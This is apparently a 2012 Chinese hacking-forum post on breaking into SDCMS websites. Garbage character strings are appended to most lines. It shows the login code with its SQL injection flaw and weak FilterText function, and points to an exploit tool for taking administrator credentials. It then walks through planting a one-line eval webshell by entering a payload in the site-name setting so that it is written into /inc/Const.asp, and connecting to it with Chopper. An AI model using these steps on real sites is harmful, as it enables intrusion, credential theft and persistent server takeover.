作者:T00LS 鬼哥! b7 y' r) f! H4 C, ]
漏洞文件:后台目录/index.asp6 O4 }! w9 Z5 k r5 l
2 t# @( J1 _# ~/ fSub Check8 O- y( k! c$ I: }! @
Dim username,password,code,getcode,Rs0 M# }! S7 a" x9 F
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
6 U1 R' a+ w( V3 \5 O username=FilterText(Trim(Request.Form("username")),1)4 L1 g3 S. j* \6 X
password=FilterText(Trim(Request.Form("password")),1)
% u4 \3 S; ~# I2 N) {4 [ code=Trim(Request.Form("yzm"))8 Y4 ]" }0 w+ E5 G+ l
getcode=Session("SDCMSCode")0 i, g3 H p: M
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
$ H: W, N- q" `. ^) e0 p IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
& l2 j5 a) Z n3 d) @- s IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied
0 k; G1 i3 ^* r8 H# y IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied4 s" D7 o8 O9 b9 n5 G- W: z
IF username="" or password="" Then, G( p4 Y4 R. G" r/ L: G
Echo "用户名或密码不能为空"ied, |7 a, d: X) w! u! w0 X F
Else
7 y% j. a( c. e( @ Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
4 T. `2 J+ X u' ? IF Rs.Eof Then
: P: i/ a% A' m# r6 R AddLog username,GetIp,"登录失败",1- |: J% H$ A- N1 |$ Q
Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"3 s' {8 N9 n) z% g! z
Else$ Q2 ]" Y! p8 _4 \
Add_Cookies "sdcms_id",Rs(0)' e# h( ]6 d' V' p2 K* x
Add_Cookies "sdcms_name",username
& x+ k5 b& x0 n8 h0 S Add_Cookies "sdcms_pwd",Rs(2)
3 a7 D' w8 N. Y3 g4 j Add_Cookies "sdcms_admin",Rs(3)
7 N! `" ~' }7 ` Add_Cookies "sdcms_alllever",Rs(4): g% [' {5 o/ Q* z+ A( ^
Add_Cookies "sdcms_infolever",Rs(5)# {7 D- F6 z& C, [
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
# c5 s5 z4 [- C- t6 w AddLog username,GetIp,"登录成功",1
; q- X4 c/ n/ y '自动删除30天前的Log记录* S. t" P+ w# x6 H" r: R
IF Sdcms_DataType Then
) c4 u% F& g# s, e8 Q$ h" r Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")# N+ D" w0 _" o& Z9 q8 z+ y" c
Else( E0 N- b. Q% x
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
9 K# q, q, k, a! j) l% o End IF
6 e7 ]" K3 X8 q a1 ?# h Go("sdcms_index.asp") l/ Y0 K( [3 A# q/ |. j
End IF. b5 q$ |7 n T/ _/ R4 ]
Rs.Close
0 X8 j% Y6 Y- ^- B, f Set Rs=Nothing
8 W: a/ j6 _7 P4 K/ O& t; [ End IF# F9 O% q5 r6 k" b+ e
End Sub( @3 U8 P5 P6 g/ G* M+ C
2 j4 c: l, f6 p0 g2 Y1 K/ ?
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码$ ^3 g- F9 L* J$ I/ u# v3 l, V0 O
2 O$ A" Y% O' RFunction FilterText(ByVal t0,ByVal t1)
: C0 j; f% x; |, g0 s- s IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
+ { b1 H& ^2 y9 p ~. G# [3 x$ u t0=Trim(t0)
3 n+ _2 l1 A, @& ]! _' J6 S' d Select Case t1
! S1 e% P C, Q/ \$ R+ I' I* j2 _! N Case "1"7 e5 z! E7 R: m6 Z) X: E6 q. h
t0=Replace(t0,Chr(32),"")4 Q- J8 {8 K7 ]
t0=Replace(t0,Chr(13),"")8 c1 ]4 A* S3 D) T r
t0=Replace(t0,Chr(10)&Chr(10),"")
+ c5 J6 ]) f4 H, g3 |( Q t0=Replace(t0,Chr(10),"")
6 r" @8 }) g7 r3 ?7 r Case "2"
8 E$ c; i: g* B/ P1 R" N t0=Replace(t0,Chr(8),"")'回格; S+ g6 F: i: z8 c, u" d" ~: Y* ]
t0=Replace(t0,Chr(9),"")'tab(水平制表符) B% V! z, H: D% ~, A7 x$ q
t0=Replace(t0,Chr(10),"")'换行3 q0 s; S$ }9 q3 e! _, _& E F
t0=Replace(t0,Chr(11),"")'tab(垂直制表符)
0 S5 b) }0 w3 ` t0=Replace(t0,Chr(12),"")'换页" B& [8 J0 S, T) F) P; a3 p
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
& [ j5 v& k. P/ P' N t0=Replace(t0,Chr(22),"")
6 Z3 S) ^2 R2 x( l, w1 J- ^2 V t0=Replace(t0,Chr(32),"")'空格 SPACE% b5 j5 E0 {- |+ H+ A7 ]
t0=Replace(t0,Chr(33),"")'!
- }' e2 W5 v e, ^ t0=Replace(t0,Chr(34),"")'"5 u3 S% P2 J, a; r6 c8 d; l
t0=Replace(t0,Chr(35),"")'#% G- G' C1 s/ i. @
t0=Replace(t0,Chr(36),"")'$
9 Z. W9 u0 K1 ^ t0=Replace(t0,Chr(37),"")'%4 D' A5 o" E0 D! r" Q
t0=Replace(t0,Chr(38),"")'&3 D5 a' t* v# e5 U" l" E7 Q
t0=Replace(t0,Chr(39),"")''
9 B1 {1 ^( l& _ O' ~4 ~ t0=Replace(t0,Chr(40),"")'() }( d* [! p; Y7 g0 N
t0=Replace(t0,Chr(41),"")')6 k2 n+ M- A. s# [. v
t0=Replace(t0,Chr(42),"")'*
. c5 a( z* S ?0 H2 k5 H t0=Replace(t0,Chr(43),"")'+
1 W! D. f! x! f0 j# A, T t0=Replace(t0,Chr(44),"")',
; X i' Q3 ~) z- \3 A t0=Replace(t0,Chr(45),"")'-
0 r7 c+ F/ V% X9 f8 B t0=Replace(t0,Chr(46),"")'., B, v' R w# E/ U6 b" L6 w$ G
t0=Replace(t0,Chr(47),"")'/( F6 I+ g& p1 _1 w. ]* V
t0=Replace(t0,Chr(58),"")':
d. z$ v3 o+ [ u" @ t0=Replace(t0,Chr(59),"")';' R6 a+ Q& k1 ?9 f7 Y
t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>! ?: Q9 Q# M& A: I' A, R2 X% K
t0=Replace(t0,Chr(63),"")'?
/ P4 |, U, a. L. e* B t0=Replace(t0,Chr(64),"")'@
Y, _ k, D+ Q4 [/ M& _0 [ t0=Replace(t0,Chr(91),"")'\
8 `# u3 R" Y& H. {, L, @! L t0=Replace(t0,Chr(92),"")'\
% F+ ~+ `; }0 i) [/ a& Y3 L t0=Replace(t0,Chr(93),"")']
1 X2 p( Q; S" P; _! m& l" c2 g t0=Replace(t0,Chr(94),"")'^8 N3 i& u8 ?# W1 T3 C% C. F- \, |8 t. D6 J
t0=Replace(t0,Chr(95),"")'_& `" L; [/ H; {9 F5 @7 C+ @
t0=Replace(t0,Chr(96),"")'`+ x; c9 o& t) P* L7 \) x" N+ M
t0=Replace(t0,Chr(123),"")'{
, u* Q$ P- j% E4 \4 R: o t0=Replace(t0,Chr(124),"")'|
5 `. i# g* Q7 ~; X& O$ _ t0=Replace(t0,Chr(125),"")'}
! b l/ \- O! U* ? t0=Replace(t0,Chr(126),"")'~/ b+ o7 B0 z% I
Case Else" w9 Q. n- y5 l6 H7 ]! v1 w
t0=Replace(t0, "&", "&")
" b1 t9 r+ o( F4 r, @ t0=Replace(t0, "'", "'")$ j) C0 s+ u' j1 S; a& y6 W+ q
t0=Replace(t0, """", """)
( S3 _5 Z5 S: L# A8 w8 k t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")8 x% z/ S( U% E+ R+ O! c* U# z" q
End Select
* Z" x' Q# D9 G% } IF Instr(Lcase(t0),"expression")>0 Then' w; Z' E/ B, h* I3 S3 C) s: k
t0=Replace(t0,"expression","e­xpression", 1, -1, 0)" j* c( V6 F: u
End If
5 [( k& y- ~1 H0 M. Q3 \ FilterText=t0- j2 t# `8 p* J+ K) ^
End Function
u5 _$ t) v% u/ K0 I' K& P9 R `
看到没。直接参数是1 只过滤
0 I7 I1 @) H$ v* X0 L# K t0=Replace(t0,Chr(32)," ")- J3 B9 C+ j! q4 l
t0=Replace(t0,Chr(13),"")7 j! G8 I( l4 J( G
t0=Replace(t0,Chr(10)&Chr(10),"9 P$ ?; r* q, ]& E& X! B: n) d
")
! ?5 y4 h# m6 l) f7 o5 n4 q* g7 w. B+ z t0=Replace(t0,Chr(10),"
* s4 ]2 Y, T3 a: D8 {")) {% g) `; M9 [3 M0 k$ g& Z( t
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!) S4 J# I/ J# j% }) O
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP
{0 u, Y0 I& C! q+ q, m- L' M: a+ A2 ^& y% f9 _
测试:% ?4 p" @, H8 ?" ]+ S, M/ ]/ b
6 ^3 j! G4 _' i/ L7 J# A6 R
5 S4 B1 [7 S' ^. L' k M6 K
现在输入工具上验证码,然后点OK
4 G9 \; d- e" D3 i$ ^. C7 d3 J
. e! O- b) y* N9 T o) ?
看到我们直接进入后台管理界面了,呵呵!- r* y( S0 {# K0 x! x2 J' F: x
! e* q5 Z: f* S+ q: J i) E+ y. d, V4 `3 \& {' G! y5 Z
- T ~4 Y$ @1 h% J+ Y这样直接进入后台了。。。。
$ D6 b, j. B3 C! T9 l' a# n7 Q% [( _& k5 J0 {; X
7 w; v: j, G* c! G; f+ c
; k( u+ A! `/ s% ~( X2 Q' DSDCMS提权:
* U& p# {1 D5 l: s* F/ z# b& w# y8 ]( `# T
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?2 r3 [8 w% N. X
' F2 T) h, ^' c+ |; @: ?; G. S
: i3 j8 c" ]9 p1 ?1 s9 R9 J
/ ^) @4 ?5 P1 Q% ~9 dOK,现在用菜刀连接下!
& y: o7 s/ p0 c, B& U! V/ |) Q! {/ ?3 X7 U: d
5 ~( V8 N6 X; M- ]
' m! g! U- |. s* E
* v7 z( ]# H: s: Z: }
% s$ q* D( q0 F6 x" x |
发表于 2012-11-9 20:57:02
收藏
支持
反对